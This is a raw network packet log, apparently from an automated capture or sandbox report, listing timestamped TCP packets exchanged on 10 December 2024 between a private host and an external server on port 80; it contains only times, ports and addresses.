Dec 10, 2024 13:10:58.485995054 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.486073017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.487324953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.487391949 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.487396002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.488852024 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.488897085 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.488914967 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.490212917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.490248919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.490298986 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.491745949 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.491756916 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.491795063 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.493117094 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.493161917 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.493961096 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.494555950 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.494601011 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.494726896 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.495675087 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.495719910 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.495726109 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.496815920 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.496857882 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.496903896 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.498099089 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.498142958 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.498269081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.499473095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.499515057 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.499525070 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.500801086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.500813961 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.500849009 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.502119064 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.502161026 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.502190113 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.503429890 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.503473043 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.503695011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.504771948 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.504816055 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.505819082 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.506195068 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.506206036 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.506242037 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.507446051 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.507489920 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.507544994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.508997917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.509008884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.509046078 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.510139942 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.510198116 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.510272980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.511419058 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.511430979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.511471033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.512993097 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.513046026 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.513073921 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.514225960 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.514235973 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.514276981 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.515434980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.515481949 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.515508890 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.516807079 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.516848087 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.516856909 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.518135071 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.518182039 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.518793106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.519704103 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.519714117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.519747972 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.520744085 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.520785093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.520795107 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.522208929 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.522218943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.522262096 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.523448944 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.523498058 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.523664951 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.524750948 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.524804115 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.524817944 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.526122093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.526169062 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.526235104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.527390003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.527400970 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.527448893 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.529030085 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.529077053 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.529577971 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.571023941 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.650001049 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.650012970 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.650067091 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.650424957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.650624990 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.650674105 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.651459932 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.651535988 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.651573896 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.652523041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.652645111 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.652688980 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.653481960 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.653650045 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.653707027 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.654525042 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.654629946 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.654671907 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.655680895 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.655692101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.655731916 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.656611919 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.656622887 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.656676054 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.657556057 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.657721043 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.657766104 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.658643007 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.658684015 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.658730030 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.659624100 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.660173893 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.660221100 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.660696030 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.660806894 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.660845995 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.661780119 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.661793947 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.661837101 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.662807941 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.663100958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.663146019 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.663899899 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.663911104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.663950920 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.665035963 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.665046930 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.665086031 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.666107893 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.666184902 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.666234016 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.667171001 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.667181969 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.667224884 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.667872906 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.667979002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.668028116 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.668884039 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.668895960 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.668932915 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.669961929 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.669972897 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.670010090 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.670938015 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.671230078 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.671273947 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.671933889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.671946049 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.671983957 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.672921896 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.673583984 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.673634052 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.674016953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.674029112 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.674067974 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.675111055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.675122023 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.675162077 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.676076889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.676265955 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.676311970 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.677078962 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.677097082 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.677135944 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.678097010 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.678184032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.678220987 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.679157972 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.679275990 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.679316998 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.680181026 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.680190086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.680231094 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.681209087 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.681220055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.681272984 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.682169914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.682264090 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.682306051 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.683216095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.683227062 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.683264017 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.684315920 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.684324980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.684354067 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.685343027 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.685353041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.685393095 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.686446905 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.686570883 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.686615944 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.687364101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.687372923 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.687411070 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.688388109 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.688438892 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.688484907 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.689400911 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.689410925 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.689451933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.690505028 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.690515041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.690566063 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.691451073 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.691461086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.691498041 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.692502022 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.692570925 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.692615986 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.693897963 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.693984032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.694025993 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.694552898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.694561958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.694602966 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.695557117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.695729017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.695769072 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.696571112 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.696697950 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.696738958 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.697741985 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.697751999 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.697796106 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.698664904 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.698674917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.698714972 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.699690104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.699700117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.699743986 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.700675964 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.701284885 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.701330900 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.701800108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.701809883 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.701841116 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.702749014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.702766895 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.702814102 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.703727007 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.758519888 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.840512991 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.840634108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.840717077 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.840894938 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.841160059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.841206074 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.841316938 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.841744900 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.841787100 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.841850996 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.842745066 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.842786074 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.842924118 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.843775988 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.843816996 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.843877077 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.844844103 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.844881058 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.844908953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.845859051 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.845895052 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.845897913 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.846965075 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.847012997 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.847383022 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.847970009 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.848006010 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.848781109 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.848910093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.848951101 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.849095106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.849894047 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.849936962 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.850027084 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.850954056 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.850991011 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.851054907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.851958036 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.851995945 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.852152109 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.853092909 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.853115082 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.853130102 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.854105949 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.854116917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.854151964 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.855138063 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.855178118 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.855245113 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.856154919 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.856164932 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.856193066 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.857106924 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.857146978 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.857336998 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.858191967 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.858228922 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.858268976 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.859148979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.859188080 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.860109091 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.860174894 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.860234022 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.860496044 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.861162901 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.861203909 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.861229897 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.862221003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.862267017 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.862428904 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.863351107 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.863362074 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.863400936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.864274979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.864317894 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.864334106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.865343094 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.865387917 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.865535021 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.866460085 CET	80	49735	45.9.191.182	192.168.2.4
